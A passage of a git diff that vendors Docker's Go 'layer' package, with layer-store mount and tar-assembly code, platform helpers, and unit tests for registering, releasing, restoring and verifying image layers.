+		logrus.Errorf("Error removing mounted layer %s: %s", m.name, err)
+		m.retakeReference(l)
+		return nil, err
+	}
+
+	if m.initID != "" {
+		if err := ls.driver.Remove(m.initID); err != nil {
+			logrus.Errorf("Error removing init layer %s: %s", m.name, err)
+			m.retakeReference(l)
+			return nil, err
+		}
+	}
+
+	if err := ls.store.RemoveMount(m.name); err != nil {
+		logrus.Errorf("Error removing mount metadata: %s: %s", m.name, err)
+		m.retakeReference(l)
+		return nil, err
+	}
+
+	delete(ls.mounts, m.Name())
+
+	ls.layerL.Lock()
+	defer ls.layerL.Unlock()
+	if m.parent != nil {
+		return ls.releaseLayer(m.parent)
+	}
+
+	return []Metadata{}, nil
+}
+
+func (ls *layerStore) saveMount(mount *mountedLayer) error {
+	if err := ls.store.SetMountID(mount.name, mount.mountID); err != nil {
+		return err
+	}
+
+	if mount.initID != "" {
+		if err := ls.store.SetInitID(mount.name, mount.initID); err != nil {
+			return err
+		}
+	}
+
+	if mount.parent != nil {
+		if err := ls.store.SetMountParent(mount.name, mount.parent.chainID); err != nil {
+			return err
+		}
+	}
+
+	ls.mounts[mount.name] = mount
+
+	return nil
+}
+
+func (ls *layerStore) initMount(graphID, parent, mountLabel string, initFunc MountInit, storageOpt map[string]string) (string, error) {
+	// Use "<graph-id>-init" to maintain compatibility with graph drivers
+	// which are expecting this layer with this special name. If all
+	// graph drivers can be updated to not rely on knowing about this layer
+	// then the initID should be randomly generated.
+	initID := fmt.Sprintf("%s-init", graphID)
+
+	createOpts := &graphdriver.CreateOpts{
+		MountLabel: mountLabel,
+		StorageOpt: storageOpt,
+	}
+
+	if err := ls.driver.CreateReadWrite(initID, parent, createOpts); err != nil {
+		return "", err
+	}
+	p, err := ls.driver.Get(initID, "")
+	if err != nil {
+		return "", err
+	}
+
+	if err := initFunc(p); err != nil {
+		ls.driver.Put(initID)
+		return "", err
+	}
+
+	if err := ls.driver.Put(initID); err != nil {
+		return "", err
+	}
+
+	return initID, nil
+}
+
+func (ls *layerStore) assembleTarTo(graphID string, metadata io.ReadCloser, size *int64, w io.Writer) error {
+	diffDriver, ok := ls.driver.(graphdriver.DiffGetterDriver)
+	if !ok {
+		diffDriver = &naiveDiffPathDriver{ls.driver}
+	}
+
+	defer metadata.Close()
+
+	// get our relative path to the container
+	fileGetCloser, err := diffDriver.DiffGetter(graphID)
+	if err != nil {
+		return err
+	}
+	defer fileGetCloser.Close()
+
+	metaUnpacker := storage.NewJSONUnpacker(metadata)
+	upackerCounter := &unpackSizeCounter{metaUnpacker, size}
+	logrus.Debugf("Assembling tar data for %s", graphID)
+	return asm.WriteOutputTarStream(fileGetCloser, upackerCounter, w)
+}
+
+func (ls *layerStore) Cleanup() error {
+	return ls.driver.Cleanup()
+}
+
+func (ls *layerStore) DriverStatus() [][2]string {
+	return ls.driver.Status()
+}
+
+func (ls *layerStore) DriverName() string {
+	return ls.driver.String()
+}
+
+type naiveDiffPathDriver struct {
+	graphdriver.Driver
+}
+
+type fileGetPutter struct {
+	storage.FileGetter
+	driver graphdriver.Driver
+	id     string
+}
+
+func (w *fileGetPutter) Close() error {
+	return w.driver.Put(w.id)
+}
+
+func (n *naiveDiffPathDriver) DiffGetter(id string) (graphdriver.FileGetCloser, error) {
+	p, err := n.Driver.Get(id, "")
+	if err != nil {
+		return nil, err
+	}
+	return &fileGetPutter{storage.NewPathFileGetter(p), n.Driver, id}, nil
+}
diff --git a/vendor/github.com/docker/docker/layer/layer_store_windows.go b/vendor/github.com/docker/docker/layer/layer_store_windows.go
new file mode 100644
index 0000000000..1276a912cc
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/layer_store_windows.go
@@ -0,0 +1,11 @@
+package layer
+
+import (
+	"io"
+
+	"github.com/docker/distribution"
+)
+
+func (ls *layerStore) RegisterWithDescriptor(ts io.Reader, parent ChainID, descriptor distribution.Descriptor) (Layer, error) {
+	return ls.registerWithDescriptor(ts, parent, descriptor)
+}
diff --git a/vendor/github.com/docker/docker/layer/layer_test.go b/vendor/github.com/docker/docker/layer/layer_test.go
new file mode 100644
index 0000000000..10712df998
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/layer_test.go
@@ -0,0 +1,771 @@
+package layer
+
+import (
+	"bytes"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/daemon/graphdriver/vfs"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/stringid"
+)
+
+func init() {
+	graphdriver.ApplyUncompressedLayer = archive.UnpackLayer
+	vfs.CopyWithTar = archive.CopyWithTar
+}
+
+func newVFSGraphDriver(td string) (graphdriver.Driver, error) {
+	uidMap := []idtools.IDMap{
+		{
+			ContainerID: 0,
+			HostID:      os.Getuid(),
+			Size:        1,
+		},
+	}
+	gidMap := []idtools.IDMap{
+		{
+			ContainerID: 0,
+			HostID:      os.Getgid(),
+			Size:        1,
+		},
+	}
+
+	options := graphdriver.Options{Root: td, UIDMaps: uidMap, GIDMaps: gidMap}
+	return graphdriver.GetDriver("vfs", nil, options)
+}
+
+func newTestGraphDriver(t *testing.T) (graphdriver.Driver, func()) {
+	td, err := ioutil.TempDir("", "graph-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	driver, err := newVFSGraphDriver(td)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	return driver, func() {
+		os.RemoveAll(td)
+	}
+}
+
+func newTestStore(t *testing.T) (Store, string, func()) {
+	td, err := ioutil.TempDir("", "layerstore-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	graph, graphcleanup := newTestGraphDriver(t)
+	fms, err := NewFSMetadataStore(td)
+	if err != nil {
+		t.Fatal(err)
+	}
+	ls, err := NewStoreFromGraphDriver(fms, graph)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	return ls, td, func() {
+		graphcleanup()
+		os.RemoveAll(td)
+	}
+}
+
+type layerInit func(root string) error
+
+func createLayer(ls Store, parent ChainID, layerFunc layerInit) (Layer, error) {
+	containerID := stringid.GenerateRandomID()
+	mount, err := ls.CreateRWLayer(containerID, parent, "", nil, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	path, err := mount.Mount("")
+	if err != nil {
+		return nil, err
+	}
+
+	if err := layerFunc(path); err != nil {
+		return nil, err
+	}
+
+	ts, err := mount.TarStream()
+	if err != nil {
+		return nil, err
+	}
+	defer ts.Close()
+
+	layer, err := ls.Register(ts, parent)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := mount.Unmount(); err != nil {
+		return nil, err
+	}
+
+	if _, err := ls.ReleaseRWLayer(mount); err != nil {
+		return nil, err
+	}
+
+	return layer, nil
+}
+
+type FileApplier interface {
+	ApplyFile(root string) error
+}
+
+type testFile struct {
+	name       string
+	content    []byte
+	permission os.FileMode
+}
+
+func newTestFile(name string, content []byte, perm os.FileMode) FileApplier {
+	return &testFile{
+		name:       name,
+		content:    content,
+		permission: perm,
+	}
+}
+
+func (tf *testFile) ApplyFile(root string) error {
+	fullPath := filepath.Join(root, tf.name)
+	if err := os.MkdirAll(filepath.Dir(fullPath), 0755); err != nil {
+		return err
+	}
+	// Check if already exists
+	if stat, err := os.Stat(fullPath); err == nil && stat.Mode().Perm() != tf.permission {
+		if err := os.Chmod(fullPath, tf.permission); err != nil {
+			return err
+		}
+	}
+	if err := ioutil.WriteFile(fullPath, tf.content, tf.permission); err != nil {
+		return err
+	}
+	return nil
+}
+
+func initWithFiles(files ...FileApplier) layerInit {
+	return func(root string) error {
+		for _, f := range files {
+			if err := f.ApplyFile(root); err != nil {
+				return err
+			}
+		}
+		return nil
+	}
+}
+
+func getCachedLayer(l Layer) *roLayer {
+	if rl, ok := l.(*referencedCacheLayer); ok {
+		return rl.roLayer
+	}
+	return l.(*roLayer)
+}
+
+func getMountLayer(l RWLayer) *mountedLayer {
+	return l.(*referencedRWLayer).mountedLayer
+}
+
+func createMetadata(layers ...Layer) []Metadata {
+	metadata := make([]Metadata, len(layers))
+	for i := range layers {
+		size, err := layers[i].Size()
+		if err != nil {
+			panic(err)
+		}
+
+		metadata[i].ChainID = layers[i].ChainID()
+		metadata[i].DiffID = layers[i].DiffID()
+		metadata[i].Size = size
+		metadata[i].DiffSize = getCachedLayer(layers[i]).size
+	}
+
+	return metadata
+}
+
+func assertMetadata(t *testing.T, metadata, expectedMetadata []Metadata) {
+	if len(metadata) != len(expectedMetadata) {
+		t.Fatalf("Unexpected number of deletes %d, expected %d", len(metadata), len(expectedMetadata))
+	}
+
+	for i := range metadata {
+		if metadata[i] != expectedMetadata[i] {
+			t.Errorf("Unexpected metadata\n\tExpected: %#v\n\tActual: %#v", expectedMetadata[i], metadata[i])
+		}
+	}
+	if t.Failed() {
+		t.FailNow()
+	}
+}
+
+func releaseAndCheckDeleted(t *testing.T, ls Store, layer Layer, removed ...Layer) {
+	layerCount := len(ls.(*layerStore).layerMap)
+	expectedMetadata := createMetadata(removed...)
+	metadata, err := ls.Release(layer)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertMetadata(t, metadata, expectedMetadata)
+
+	if expected := layerCount - len(removed); len(ls.(*layerStore).layerMap) != expected {
+		t.Fatalf("Unexpected number of layers %d, expected %d", len(ls.(*layerStore).layerMap), expected)
+	}
+}
+
+func cacheID(l Layer) string {
+	return getCachedLayer(l).cacheID
+}
+
+func assertLayerEqual(t *testing.T, l1, l2 Layer) {
+	if l1.ChainID() != l2.ChainID() {
+		t.Fatalf("Mismatched ID: %s vs %s", l1.ChainID(), l2.ChainID())
+	}
+	if l1.DiffID() != l2.DiffID() {
+		t.Fatalf("Mismatched DiffID: %s vs %s", l1.DiffID(), l2.DiffID())
+	}
+
+	size1, err := l1.Size()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	size2, err := l2.Size()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if size1 != size2 {
+		t.Fatalf("Mismatched size: %d vs %d", size1, size2)
+	}
+
+	if cacheID(l1) != cacheID(l2) {
+		t.Fatalf("Mismatched cache id: %s vs %s", cacheID(l1), cacheID(l2))
+	}
+
+	p1 := l1.Parent()
+	p2 := l2.Parent()
+	if p1 != nil && p2 != nil {
+		assertLayerEqual(t, p1, p2)
+	} else if p1 != nil || p2 != nil {
+		t.Fatalf("Mismatched parents: %v vs %v", p1, p2)
+	}
+}
+
+func TestMountAndRegister(t *testing.T) {
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	li := initWithFiles(newTestFile("testfile.txt", []byte("some test data"), 0644))
+	layer, err := createLayer(ls, "", li)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	size, _ := layer.Size()
+	t.Logf("Layer size: %d", size)
+
+	mount2, err := ls.CreateRWLayer("new-test-mount", layer.ChainID(), "", nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	path2, err := mount2.Mount("")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	b, err := ioutil.ReadFile(filepath.Join(path2, "testfile.txt"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected := "some test data"; string(b) != expected {
+		t.Fatalf("Wrong file data, expected %q, got %q", expected, string(b))
+	}
+
+	if err := mount2.Unmount(); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := ls.ReleaseRWLayer(mount2); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestLayerRelease(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	layer1, err := createLayer(ls, "", initWithFiles(newTestFile("layer1.txt", []byte("layer 1 file"), 0644)))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer2, err := createLayer(ls, layer1.ChainID(), initWithFiles(newTestFile("layer2.txt", []byte("layer 2 file"), 0644)))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := ls.Release(layer1); err != nil {
+		t.Fatal(err)
+	}
+
+	layer3a, err := createLayer(ls, layer2.ChainID(), initWithFiles(newTestFile("layer3.txt", []byte("layer 3a file"), 0644)))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer3b, err := createLayer(ls, layer2.ChainID(), initWithFiles(newTestFile("layer3.txt", []byte("layer 3b file"), 0644)))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := ls.Release(layer2); err != nil {
+		t.Fatal(err)
+	}
+
+	t.Logf("Layer1:  %s", layer1.ChainID())
+	t.Logf("Layer2:  %s", layer2.ChainID())
+	t.Logf("Layer3a: %s", layer3a.ChainID())
+	t.Logf("Layer3b: %s", layer3b.ChainID())
+
+	if expected := 4; len(ls.(*layerStore).layerMap) != expected {
+		t.Fatalf("Unexpected number of layers %d, expected %d", len(ls.(*layerStore).layerMap), expected)
+	}
+
+	releaseAndCheckDeleted(t, ls, layer3b, layer3b)
+	releaseAndCheckDeleted(t, ls, layer3a, layer3a, layer2, layer1)
+}
+
+func TestStoreRestore(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	layer1, err := createLayer(ls, "", initWithFiles(newTestFile("layer1.txt", []byte("layer 1 file"), 0644)))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer2, err := createLayer(ls, layer1.ChainID(), initWithFiles(newTestFile("layer2.txt", []byte("layer 2 file"), 0644)))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := ls.Release(layer1); err != nil {
+		t.Fatal(err)
+	}
+
+	layer3, err := createLayer(ls, layer2.ChainID(), initWithFiles(newTestFile("layer3.txt", []byte("layer 3 file"), 0644)))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := ls.Release(layer2); err != nil {
+		t.Fatal(err)
+	}
+
+	m, err := ls.CreateRWLayer("some-mount_name", layer3.ChainID(), "", nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	path, err := m.Mount("")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := ioutil.WriteFile(filepath.Join(path, "testfile.txt"), []byte("nothing here"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := m.Unmount(); err != nil {
+		t.Fatal(err)
+	}
+
+	ls2, err := NewStoreFromGraphDriver(ls.(*layerStore).store, ls.(*layerStore).driver)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer3b, err := ls2.Get(layer3.ChainID())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertLayerEqual(t, layer3b, layer3)
+
+	// Create again with same name, should return error
+	if _, err := ls2.CreateRWLayer("some-mount_name", layer3b.ChainID(), "", nil, nil); err == nil {
+		t.Fatal("Expected error creating mount with same name")
+	} else if err != ErrMountNameConflict {
+		t.Fatal(err)
+	}
+
+	m2, err := ls2.GetRWLayer("some-mount_name")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if mountPath, err := m2.Mount(""); err != nil {
+		t.Fatal(err)
+	} else if path != mountPath {
+		t.Fatalf("Unexpected path %s, expected %s", mountPath, path)
+	}
+
+	if mountPath, err := m2.Mount(""); err != nil {
+		t.Fatal(err)
+	} else if path != mountPath {
+		t.Fatalf("Unexpected path %s, expected %s", mountPath, path)
+	}
+	if err := m2.Unmount(); err != nil {
+		t.Fatal(err)
+	}
+
+	b, err := ioutil.ReadFile(filepath.Join(path, "testfile.txt"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if expected := "nothing here"; string(b) != expected {
+		t.Fatalf("Unexpected content %q, expected %q", string(b), expected)
+	}
+
+	if err := m2.Unmount(); err != nil {
+		t.Fatal(err)
+	}
+
+	if metadata, err := ls2.ReleaseRWLayer(m2); err != nil {
+		t.Fatal(err)
+	} else if len(metadata) != 0 {
+		t.Fatalf("Unexpectedly deleted layers: %#v", metadata)
+	}
+
+	if metadata, err := ls2.ReleaseRWLayer(m2); err != nil {
+		t.Fatal(err)
+	} else if len(metadata) != 0 {
+		t.Fatalf("Unexpectedly deleted layers: %#v", metadata)
+	}
+
+	releaseAndCheckDeleted(t, ls2, layer3b, layer3, layer2, layer1)
+}
+
+func TestTarStreamStability(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	files1 := []FileApplier{
+		newTestFile("/etc/hosts", []byte("mydomain 10.0.0.1"), 0644),
+		newTestFile("/etc/profile", []byte("PATH=/usr/bin"), 0644),
+	}
+	addedFile := newTestFile("/etc/shadow", []byte("root:::::::"), 0644)
+	files2 := []FileApplier{
+		newTestFile("/etc/hosts", []byte("mydomain 10.0.0.2"), 0644),
+		newTestFile("/etc/profile", []byte("PATH=/usr/bin"), 0664),
+		newTestFile("/root/.bashrc", []byte("PATH=/usr/sbin:/usr/bin"), 0644),
+	}
+
+	tar1, err := tarFromFiles(files1...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	tar2, err := tarFromFiles(files2...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer1, err := ls.Register(bytes.NewReader(tar1), "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// hack layer to add file
+	p, err := ls.(*layerStore).driver.Get(layer1.(*referencedCacheLayer).cacheID, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := addedFile.ApplyFile(p); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := ls.(*layerStore).driver.Put(layer1.(*referencedCacheLayer).cacheID); err != nil {
+		t.Fatal(err)
+	}
+
+	layer2, err := ls.Register(bytes.NewReader(tar2), layer1.ChainID())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id1 := layer1.ChainID()
+	t.Logf("Layer 1: %s", layer1.ChainID())
+	t.Logf("Layer 2: %s", layer2.ChainID())
+
+	if _, err := ls.Release(layer1); err != nil {
+		t.Fatal(err)
+	}
+
+	assertLayerDiff(t, tar2, layer2)
+
+	layer1b, err := ls.Get(id1)
+	if err != nil {
+		t.Logf("Content of layer map: %#v", ls.(*layerStore).layerMap)
+		t.Fatal(err)
+	}
+
+	if _, err := ls.Release(layer2); err != nil {
+		t.Fatal(err)
+	}
+
+	assertLayerDiff(t, tar1, layer1b)
+
+	if _, err := ls.Release(layer1b); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func assertLayerDiff(t *testing.T, expected []byte, layer Layer) {
+	expectedDigest := digest.FromBytes(expected)
+
+	if digest.Digest(layer.DiffID()) != expectedDigest {
+		t.Fatalf("Mismatched diff id for %s, got %s, expected %s", layer.ChainID(), layer.DiffID(), expected)
+	}
+
+	ts, err := layer.TarStream()
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer ts.Close()
+
+	actual, err := ioutil.ReadAll(ts)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(actual) != len(expected) {
+		logByteDiff(t, actual, expected)
+		t.Fatalf("Mismatched tar stream size for %s, got %d, expected %d", layer.ChainID(), len(actual), len(expected))
+	}
+
+	actualDigest := digest.FromBytes(actual)
+
+	if actualDigest != expectedDigest {
+		logByteDiff(t, actual, expected)
+		t.Fatalf("Wrong digest of tar stream, got %s, expected %s", actualDigest, expectedDigest)
+	}
+}
+
+const maxByteLog = 4 * 1024
+
+func logByteDiff(t *testing.T, actual, expected []byte) {
+	d1, d2 := byteDiff(actual, expected)
+	if len(d1) == 0 && len(d2) == 0 {
+		return
+	}
+
+	prefix := len(actual) - len(d1)
+	if len(d1) > maxByteLog || len(d2) > maxByteLog {
+		t.Logf("Byte diff after %d matching bytes", prefix)
+	} else {
+		t.Logf("Byte diff after %d matching bytes\nActual bytes after prefix:\n%x\nExpected bytes after prefix:\n%x", prefix, d1, d2)
+	}
+}
+
+// byteDiff returns the differing bytes after the matching prefix
+func byteDiff(b1, b2 []byte) ([]byte, []byte) {
+	i := 0
+	for i < len(b1) && i < len(b2) {
+		if b1[i] != b2[i] {
+			break
+		}
+		i++
+	}
+
+	return b1[i:], b2[i:]
+}
+
+func tarFromFiles(files ...FileApplier) ([]byte, error) {
+	td, err := ioutil.TempDir("", "tar-")
+	if err != nil {
+		return nil, err
+	}
+	defer os.RemoveAll(td)
+
+	for _, f := range files {
+		if err := f.ApplyFile(td); err != nil {
+			return nil, err
+		}
+	}
+
+	r, err := archive.Tar(td, archive.Uncompressed)
+	if err != nil {
+		return nil, err
+	}
+
+	buf := bytes.NewBuffer(nil)
+	if _, err := io.Copy(buf, r); err != nil {
+		return nil, err
+	}
+
+	return buf.Bytes(), nil
+}
+
+// assertReferences asserts that all the references are to the same
+// image and represent the full set of references to that image.
+func assertReferences(t *testing.T, references ...Layer) {
+	if len(references) == 0 {
+		return
+	}
+	base := references[0].(*referencedCacheLayer).roLayer
+	seenReferences := map[Layer]struct{}{
+		references[0]: {},
+	}
+	for i := 1; i < len(references); i++ {
+		other := references[i].(*referencedCacheLayer).roLayer
+		if base != other {
+			t.Fatalf("Unexpected referenced cache layer %s, expecting %s", other.ChainID(), base.ChainID())
+		}
+		if _, ok := base.references[references[i]]; !ok {
+			t.Fatalf("Reference not part of reference list: %v", references[i])
+		}
+		if _, ok := seenReferences[references[i]]; ok {
+			t.Fatalf("Duplicated reference %v", references[i])
+		}
+	}
+	if rc := len(base.references); rc != len(references) {
+		t.Fatalf("Unexpected number of references %d, expecting %d", rc, len(references))
+	}
+}
+
+func TestRegisterExistingLayer(t *testing.T) {
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	baseFiles := []FileApplier{
+		newTestFile("/etc/profile", []byte("# Base configuration"), 0644),
+	}
+
+	layerFiles := []FileApplier{
+		newTestFile("/root/.bashrc", []byte("# Root configuration"), 0644),
+	}
+
+	li := initWithFiles(baseFiles...)
+	layer1, err := createLayer(ls, "", li)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	tar1, err := tarFromFiles(layerFiles...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer2a, err := ls.Register(bytes.NewReader(tar1), layer1.ChainID())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer2b, err := ls.Register(bytes.NewReader(tar1), layer1.ChainID())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertReferences(t, layer2a, layer2b)
+}
+
+func TestTarStreamVerification(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	ls, tmpdir, cleanup := newTestStore(t)
+	defer cleanup()
+
+	files1 := []FileApplier{
+		newTestFile("/foo", []byte("abc"), 0644),
+		newTestFile("/bar", []byte("def"), 0644),
+	}
+	files2 := []FileApplier{
+		newTestFile("/foo", []byte("abc"), 0644),
+		newTestFile("/bar", []byte("def"), 0600), // different perm
+	}
+
+	tar1, err := tarFromFiles(files1...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	tar2, err := tarFromFiles(files2...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer1, err := ls.Register(bytes.NewReader(tar1), "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer2, err := ls.Register(bytes.NewReader(tar2), "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	id1 := digest.Digest(layer1.ChainID())
+	id2 := digest.Digest(layer2.ChainID())
+
+	// Replace tar data files
+	src, err := os.Open(filepath.Join(tmpdir, id1.Algorithm().String(), id1.Hex(), "tar-split.json.gz"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer src.Close()
+
+	dst, err := os.Create(filepath.Join(tmpdir, id2.Algorithm().String(), id2.Hex(), "tar-split.json.gz"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer dst.Close()
+
+	if _, err := io.Copy(dst, src); err != nil {
+		t.Fatal(err)
+	}
+
+	src.Sync()
+	dst.Sync()
+
+	ts, err := layer2.TarStream()
+	if err != nil {
+		t.Fatal(err)
+	}
+	_, err = io.Copy(ioutil.Discard, ts)
+	if err == nil {
+		t.Fatal("expected data verification to fail")
+	}
+	if !strings.Contains(err.Error(), "could not verify layer data") {
+		t.Fatalf("wrong error returned from tarstream: %q", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/layer/layer_unix.go b/vendor/github.com/docker/docker/layer/layer_unix.go
new file mode 100644
index 0000000000..776b78ac02
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/layer_unix.go
@@ -0,0 +1,9 @@
+// +build linux freebsd darwin openbsd solaris
+
+package layer
+
+import "github.com/docker/docker/pkg/stringid"
+
+func (ls *layerStore) mountID(name string) string {
+	return stringid.GenerateRandomID()
+}
diff --git a/vendor/github.com/docker/docker/layer/layer_unix_test.go b/vendor/github.com/docker/docker/layer/layer_unix_test.go
new file mode 100644
index 0000000000..9aa1afd597
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/layer_unix_test.go
@@ -0,0 +1,71 @@
+// +build !windows
+
+package layer
+
+import "testing"
+
+func graphDiffSize(ls Store, l Layer) (int64, error) {
+	cl := getCachedLayer(l)
+	var parent string
+	if cl.parent != nil {
+		parent = cl.parent.cacheID
+	}
+	return ls.(*layerStore).driver.DiffSize(cl.cacheID, parent)
+}
+
+// Unix as Windows graph driver does not support Changes which is indirectly
+// invoked by calling DiffSize on the driver
+func TestLayerSize(t *testing.T) {
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	content1 := []byte("Base contents")
+	content2 := []byte("Added contents")
+
+	layer1, err := createLayer(ls, "", initWithFiles(newTestFile("file1", content1, 0644)))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer2, err := createLayer(ls, layer1.ChainID(), initWithFiles(newTestFile("file2", content2, 0644)))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer1DiffSize, err := graphDiffSize(ls, layer1)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if int(layer1DiffSize) != len(content1) {
+		t.Fatalf("Unexpected diff size %d, expected %d", layer1DiffSize, len(content1))
+	}
+
+	layer1Size, err := layer1.Size()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected := len(content1); int(layer1Size) != expected {
+		t.Fatalf("Unexpected size %d, expected %d", layer1Size, expected)
+	}
+
+	layer2DiffSize, err := graphDiffSize(ls, layer2)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if int(layer2DiffSize) != len(content2) {
+		t.Fatalf("Unexpected diff size %d, expected %d", layer2DiffSize, len(content2))
+	}
+
+	layer2Size, err := layer2.Size()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected := len(content1) + len(content2); int(layer2Size) != expected {
+		t.Fatalf("Unexpected size %d, expected %d", layer2Size, expected)
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/layer/layer_windows.go b/vendor/github.com/docker/docker/layer/layer_windows.go
new file mode 100644
index 0000000000..e20311a091
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/layer_windows.go
@@ -0,0 +1,98 @@
+package layer
+
+import (
+	"errors"
+	"fmt"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/daemon/graphdriver"
+)
+
+// GetLayerPath returns the path to a layer
+func GetLayerPath(s Store, layer ChainID) (string, error) {
+	ls, ok := s.(*layerStore)
+	if !ok {
+		return "", errors.New("unsupported layer store")
+	}
+	ls.layerL.Lock()
+	defer ls.layerL.Unlock()
+
+	rl, ok := ls.layerMap[layer]
+	if !ok {
+		return "", ErrLayerDoesNotExist
+	}
+
+	path, err := ls.driver.Get(rl.cacheID, "")
+	if err != nil {
+		return "", err
+	}
+
+	if err := ls.driver.Put(rl.cacheID); err != nil {
+		return "", err
+	}
+
+	return path, nil
+}
+
+func (ls *layerStore) RegisterDiffID(graphID string, size int64) (Layer, error) {
+	var err error // this is used for cleanup in existingLayer case
+	diffID := digest.FromBytes([]byte(graphID))
+
+	// Create new roLayer
+	layer := &roLayer{
+		cacheID:        graphID,
+		diffID:         DiffID(diffID),
+		referenceCount: 1,
+		layerStore:     ls,
+		references:     map[Layer]struct{}{},
+		size:           size,
+	}
+
+	tx, err := ls.store.StartTransaction()
+	if err != nil {
+		return nil, err
+	}
+	defer func() {
+		if err != nil {
+			if err := tx.Cancel(); err != nil {
+				logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err)
+			}
+		}
+	}()
+
+	layer.chainID = createChainIDFromParent("", layer.diffID)
+
+	if !ls.driver.Exists(layer.cacheID) {
+		return nil, fmt.Errorf("layer %q is unknown to driver", layer.cacheID)
+	}
+	if err = storeLayer(tx, layer); err != nil {
+		return nil, err
+	}
+
+	ls.layerL.Lock()
+	defer ls.layerL.Unlock()
+
+	if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil {
+		// Set error for cleanup, but do not return
+		err = errors.New("layer already exists")
+		return existingLayer.getReference(), nil
+	}
+
+	if err = tx.Commit(layer.chainID); err != nil {
+		return nil, err
+	}
+
+	ls.layerMap[layer.chainID] = layer
+
+	return layer.getReference(), nil
+}
+
+func (ls *layerStore) mountID(name string) string {
+	// windows has issues if container ID doesn't match mount ID
+	return name
+}
+
+func (ls *layerStore) GraphDriver() graphdriver.Driver {
+	return ls.driver
+}
diff --git a/vendor/github.com/docker/docker/layer/migration.go b/vendor/github.com/docker/docker/layer/migration.go
new file mode 100644
index 0000000000..b45c31099d
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/migration.go
@@ -0,0 +1,256 @@
+package layer
+
+import (
+	"compress/gzip"
+	"errors"
+	"fmt"
+	"io"
